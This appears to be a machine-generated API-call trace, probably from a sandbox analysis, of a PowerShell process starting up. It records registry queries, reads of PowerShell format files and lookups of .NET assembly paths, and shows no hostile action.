	[0755.559] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x314) returned 0x0
	[0755.559] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x56) returned 0x0
	[0755.559] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e2060
	[0755.559] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d41c, lpData=0x1b8e2060, lpcbData=0x24d418*=0x56 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d418*=0x56) returned 0x0
	[0755.559] CoTaskMemFree (pv=0x1b8e2060) 
	[0755.559] RegCloseKey (hKey=0x314) returned 0x0
	[0755.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.564] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xfe08cfba, Data2=0xadd2, Data3=0x4a84, Data4=([0]=0xad, [1]=0x6b, [2]=0x9d, [3]=0x7c, [4]=0x8e, [5]=0x93, [6]=0xbc, [7]=0xaf))) returned 0x0
	[0755.569] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x40ae4e5, Data2=0xf990, Data3=0x4172, Data4=([0]=0xb7, [1]=0xcf, [2]=0x6d, [3]=0x26, [4]=0x28, [5]=0xe2, [6]=0xf8, [7]=0xc6))) returned 0x0
	[0755.571] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0755.571] GetFileType (hFile=0x314) returned 0x1
	[0755.571] SetErrorMode (uMode=0x1) returned 0x1
	[0755.572] GetFileType (hFile=0x314) returned 0x1
	[0755.572] ReadFile (in: hFile=0x314, lpBuffer=0x3227ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3227ab0*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.573] ReadFile (in: hFile=0x314, lpBuffer=0x3227ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3227ab0*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.586] ReadFile (in: hFile=0x314, lpBuffer=0x3227ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3227ab0*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.587] ReadFile (in: hFile=0x314, lpBuffer=0x3227ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3227ab0*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0755.587] ReadFile (in: hFile=0x314, lpBuffer=0x3227ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3227ab0*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0757.234] ReadFile (in: hFile=0x314, lpBuffer=0x3227ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3227ab0*, lpNumberOfBytesRead=0x24d438*=0xfb2, lpOverlapped=0x0) returned 1
	[0757.234] ReadFile (in: hFile=0x314, lpBuffer=0x32271ca, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x32271ca*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0757.234] ReadFile (in: hFile=0x314, lpBuffer=0x3227ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3227ab0*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0757.234] CloseHandle (hObject=0x314) returned 1
	[0757.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0757.235] SetErrorMode (uMode=0x1) returned 0x1
	[0757.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3e0 | out: lpFileInformation=0x24d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0757.235] SetErrorMode (uMode=0x1) returned 0x1
	[0757.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0757.235] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x314) returned 0x0
	[0757.236] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x56) returned 0x0
	[0757.236] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e2060
	[0757.236] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d41c, lpData=0x1b8e2060, lpcbData=0x24d418*=0x56 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d418*=0x56) returned 0x0
	[0757.236] CoTaskMemFree (pv=0x1b8e2060) 
	[0757.236] RegCloseKey (hKey=0x314) returned 0x0
	[0757.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0757.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0757.244] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x5914bb38, Data2=0x1c9e, Data3=0x4950, Data4=([0]=0xb4, [1]=0x9b, [2]=0x74, [3]=0xf, [4]=0xd8, [5]=0x3e, [6]=0x5a, [7]=0x6b))) returned 0x0
	[0757.250] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x7e0733da, Data2=0xb275, Data3=0x44bd, Data4=([0]=0xa9, [1]=0x1e, [2]=0x63, [3]=0x5e, [4]=0x16, [5]=0xea, [6]=0x9, [7]=0xa2))) returned 0x0
	[0757.251] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x80a7713f, Data2=0x4f14, Data3=0x4491, Data4=([0]=0xbd, [1]=0x16, [2]=0x7e, [3]=0xbe, [4]=0x73, [5]=0x9c, [6]=0x1e, [7]=0xfd))) returned 0x0
	[0757.252] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x11b64cec, Data2=0x5b6c, Data3=0x4f0b, Data4=([0]=0x93, [1]=0x1b, [2]=0x79, [3]=0x3, [4]=0xa5, [5]=0x53, [6]=0x3b, [7]=0x8b))) returned 0x0
	[0757.253] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xad2feb3c, Data2=0xef20, Data3=0x4e87, Data4=([0]=0x91, [1]=0x5b, [2]=0xd8, [3]=0x83, [4]=0xbc, [5]=0xd0, [6]=0x7d, [7]=0x7d))) returned 0x0
	[0757.253] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x73c4e8d1, Data2=0x9f54, Data3=0x44c5, Data4=([0]=0xbd, [1]=0x95, [2]=0xaf, [3]=0xbf, [4]=0x63, [5]=0xab, [6]=0x50, [7]=0xd2))) returned 0x0
	[0757.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.254] SetErrorMode (uMode=0x1) returned 0x1
	[0757.254] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0757.254] GetFileType (hFile=0x2f0) returned 0x1
	[0757.255] SetErrorMode (uMode=0x1) returned 0x1
	[0757.255] GetFileType (hFile=0x2f0) returned 0x1
	[0757.255] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d4398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d4398*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0757.255] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d4398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d4398*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0757.258] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d4398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d4398*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0757.258] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d4398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d4398*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0757.258] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d4398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d4398*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0757.259] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d4398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d4398*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0757.259] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d4398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d4398*, lpNumberOfBytesRead=0x24d438*=0xaca, lpOverlapped=0x0) returned 1
	[0757.259] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d39ca, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d39ca*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0757.259] ReadFile (in: hFile=0x2f0, lpBuffer=0x30d4398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x30d4398*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0757.259] CloseHandle (hObject=0x2f0) returned 1
	[0757.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.260] SetErrorMode (uMode=0x1) returned 0x1
	[0757.260] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3e0 | out: lpFileInformation=0x24d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0757.260] SetErrorMode (uMode=0x1) returned 0x1
	[0757.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.260] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x2f0) returned 0x0
	[0757.260] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x56) returned 0x0
	[0757.260] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e1f10
	[0757.260] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d41c, lpData=0x1b8e1f10, lpcbData=0x24d418*=0x56 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d418*=0x56) returned 0x0
	[0757.260] CoTaskMemFree (pv=0x1b8e1f10) 
	[0757.261] RegCloseKey (hKey=0x2f0) returned 0x0
	[0757.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0757.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0758.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0758.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0758.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0758.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0758.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0758.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0758.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0758.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0758.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0758.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0758.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0758.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0758.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0758.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0758.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0758.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0758.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.891] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x2adc58b1, Data2=0x64ca, Data3=0x4975, Data4=([0]=0x93, [1]=0xff, [2]=0xf, [3]=0x55, [4]=0xda, [5]=0x33, [6]=0xbc, [7]=0x35))) returned 0x0
	[0759.891] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x622d2b33, Data2=0x2925, Data3=0x46c4, Data4=([0]=0xb9, [1]=0xce, [2]=0xe1, [3]=0x44, [4]=0x3c, [5]=0x7e, [6]=0xfa, [7]=0xc4))) returned 0x0
	[0759.891] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x7ab6faff, Data2=0x2d1e, Data3=0x4144, Data4=([0]=0xa9, [1]=0xcd, [2]=0xab, [3]=0x53, [4]=0xfc, [5]=0x59, [6]=0xfa, [7]=0x13))) returned 0x0
	[0759.892] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xdb656d17, Data2=0xb811, Data3=0x4f46, Data4=([0]=0xa6, [1]=0xed, [2]=0xb1, [3]=0xd1, [4]=0xf8, [5]=0x8c, [6]=0x80, [7]=0x8))) returned 0x0
	[0759.892] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x31b0d523, Data2=0x964f, Data3=0x44c3, Data4=([0]=0x93, [1]=0xa8, [2]=0xdd, [3]=0xee, [4]=0x78, [5]=0x2b, [6]=0x14, [7]=0xbe))) returned 0x0
	[0759.892] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0759.893] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x17f125e6, Data2=0x648a, Data3=0x47b1, Data4=([0]=0xad, [1]=0x9c, [2]=0x23, [3]=0x41, [4]=0x8c, [5]=0x70, [6]=0xad, [7]=0x3f))) returned 0x0
	[0759.893] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xd4fcab09, Data2=0x6ec4, Data3=0x4401, Data4=([0]=0x8d, [1]=0x65, [2]=0x1d, [3]=0x20, [4]=0xb5, [5]=0xad, [6]=0x84, [7]=0x8c))) returned 0x0
	[0759.893] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0759.893] GetFileType (hFile=0x2f0) returned 0x1
	[0759.893] SetErrorMode (uMode=0x1) returned 0x1
	[0759.893] GetFileType (hFile=0x2f0) returned 0x1
	[0759.893] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
